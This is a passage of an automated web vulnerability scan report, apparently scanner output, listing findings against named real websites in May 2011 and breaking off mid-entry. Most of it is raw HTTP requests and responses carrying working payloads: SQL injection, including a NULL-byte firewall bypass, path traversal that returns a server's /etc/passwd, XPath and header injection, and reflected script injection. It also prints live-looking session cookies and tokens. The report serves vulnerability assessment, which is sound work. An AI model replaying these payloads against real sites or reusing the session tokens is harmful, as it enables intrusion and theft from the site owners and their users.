User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8

Response 2

HTTP/1.1 301 Moved Permanently
Date: Thu, 12 May 2011 18:36:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Set-Cookie: sl_session=2d642a2ebf431247abb7d7a4aa556bba; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 0


1.105. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm [NewsID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The NewsID parameter appears to be vulnerable to SQL injection attacks. The payloads 46402591%20or%201%3d1--%20 and 46402591%20or%201%3d2--%20 were each submitted in the NewsID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=383746402591%20or%201%3d1--%20 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A24%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:24 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<b>beats chasing a burning dog</b></td>
   </tr>
   <tr height="100">
       <td class="Text" colspan="3" valign="top" align="left">
       
       </td>
   </tr>
   </table>
   
       </td>
   </tr>
   
   </table>
   
   
</td>

</tr>
</table>

</td>
</tr>
</table>

<table border="0" align="center" cellspacing="0" cellpadding="0" width="762" bgcolor="#FFFFFF">
   <tr>
   <td align="center">

   
   <table border="0" bgcolor="#B1AFB0" cellspacing="0" cellpadding="0" width="100%" align="center">
    <tr>
   
    <td align="center">




   <table cellspacing="0" cellpadding="0" width="100%" align="center" bgcolor="#b1afb0" border="0">
<tbody>
<tr>
<td align="center" width="800">
<table cellspacing="0" cellpadding="4" border="0" style="width: 142px; color: rgb(255,255,255); height: 25px">
<tbody>
<tr>
<td align="center"><a style="font-weight: bold; color: rgb(255,255,255); text-decoration: none" href="/clubportal/wala/Page.cfm?clubID=177&amp;pubmenuoptID=10458">Contact Us</a></td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="4" width="100%" border="0" style="color: rgb(255,255,255)">
<tbody>
<tr>
<td align="left">Copyright 2010 All rights reserved.</td>
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>

    </td>
    </tr>
   </table>
   

<table align="center" width="100%" cellspacing="0" cellpadding="4" height="15" class="goclubfootertable">    
<tr>
<td align="center"><span class="fineprint">Site provided by</span><br><a href="http://www.elawmarketing.com" target="_blank"><img src="/clubpo
...[SNIP]...

Request 2

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=383746402591%20or%201%3d2--%20 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D2%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.1.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A24%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D3%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:24 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<b></b></td>
   </tr>
   <tr height="100">
       <td class="Text" colspan="3" valign="top" align="left">
       
       </td>
   </tr>
   </table>
   
       </td>
   </tr>
   
   </table>
   
   
</td>

</tr>
</table>

</td>
</tr>
</table>

<table border="0" align="center" cellspacing="0" cellpadding="0" width="762" bgcolor="#FFFFFF">
   <tr>
   <td align="center">

   
   <table border="0" bgcolor="#B1AFB0" cellspacing="0" cellpadding="0" width="100%" align="center">
    <tr>
   
    <td align="center">




   <table cellspacing="0" cellpadding="0" width="100%" align="center" bgcolor="#b1afb0" border="0">
<tbody>
<tr>
<td align="center" width="800">
<table cellspacing="0" cellpadding="4" border="0" style="width: 142px; color: rgb(255,255,255); height: 25px">
<tbody>
<tr>
<td align="center"><a style="font-weight: bold; color: rgb(255,255,255); text-decoration: none" href="/clubportal/wala/Page.cfm?clubID=177&amp;pubmenuoptID=10458">Contact Us</a></td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="4" width="100%" border="0" style="color: rgb(255,255,255)">
<tbody>
<tr>
<td align="left">Copyright 2010 All rights reserved.</td>
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>

    </td>
    </tr>
   </table>
   

<table align="center" width="100%" cellspacing="0" cellpadding="4" height="15" class="goclubfootertable">    
<tr>
<td align="center"><span class="fineprint">Site provided by</span><br><a href="http://www.elawmarketing.com" target="_blank"><img src="/clubportal/images/logos/elawlogo3
...[SNIP]...

1.106. http://www.wiggin.com/showarea.aspx [Show parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wiggin.com
Path:   /showarea.aspx

Issue detail

The Show parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the Show parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /showarea.aspx?Show=10669%00' HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/areas.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.2.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4564

<html>
<head>
<title>Unclosed quotation mark before the character string ''.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black
...[SNIP]...

2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hartfordbusiness.com
Path:   /fs_webkit/fs_css_processor.php

Issue detail

The src parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /template/hbj/forms.fcss../../../../../../../../etc/passwd was submitted in the src parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /fs_webkit/fs_css_processor.php?src=/template/hbj/forms.fcss../../../../../../../../etc/passwd&color=primary!891709*sidebar!EEE1CE*link!0000FF*link_hover!ff0000 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6122

/* WARNING: I COULDN'T WRITE THIS FILE, THE DIRECTORY IS WRITE PROTECTED */
/* TRIED TO WRITE FILE : /app/production/nebm/universal/template/hbj/forms.css../../../../../../../../etc/passwd*/
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
haldaemon:x:103:108:Hardwa
...[SNIP]...

3. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.usatoday.com
Path:   /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm' HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:28 GMT
Connection: close
Content-Length: 2866

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

4. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3ca7a%0d%0a43c5b8cf812 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3ca7a%0d%0a43c5b8cf812/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.16.57.32 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3ca7a
43c5b8cf812
/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.16.57.32:
Date: Thu, 12 May 2011 19:54:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 58306%0d%0a81ee06eb858 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /58306%0d%0a81ee06eb858/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/58306
81ee06eb858
/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3;sz=300x250;ord=[timestamp]:
Date: Fri, 13 May 2011 00:43:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5. Cross-site scripting (reflected)  previous  next
There are 109 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ds.addthis.com/red/psi/sites/www.dmoc.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.dmoc.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 216f1<script>alert(1)</script>03ce066cb79 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.dmoc.com/p.json?callback=_ate.ad.hpr216f1<script>alert(1)</script>03ce066cb79&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.dmoc.com%2Fpractice&ref=http%3A%2F%2Fwww.dmoc.com%2F&1gd1nk7 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 18:08:46 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 18:08:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 18:08:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 18:08:46 GMT
Connection: close

_ate.ad.hpr216f1<script>alert(1)</script>03ce066cb79({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.2. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c169a<script>alert(1)</script>da128c23be7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hprc169a<script>alert(1)</script>da128c23be7&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fstaff&ref=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&1309hcm HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 16:35:18 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 16:35:18 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 16:35:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 16:35:18 GMT
Connection: close

_ate.ad.hprc169a<script>alert(1)</script>da128c23be7({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.3. http://ds.addthis.com/red/psi/sites/www.letipli.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.letipli.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f28a5<script>alert(1)</script>3d1c81797c5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.letipli.com/p.json?callback=_ate.ad.hprf28a5<script>alert(1)</script>3d1c81797c5&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.letipli.com%2Fmember_details.asp8e4b7--%253E%253Cscript%253Ealert(%2522GHDB%2522)%253C%2Fscript%253E76ff3e246a7&ref=http%3A%2F%2Fburp%2Fshow%2F16&1jbi7oi HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305216717.1FE|1305216717.1OD|1305216717.60|1305219565.1EY; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 13 May 2011 00:42:40 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 12 Jun 2011 00:42:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 13 May 2011 00:42:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 13 May 2011 00:42:40 GMT
Connection: close

_ate.ad.hprf28a5<script>alert(1)</script>3d1c81797c5({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.4. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

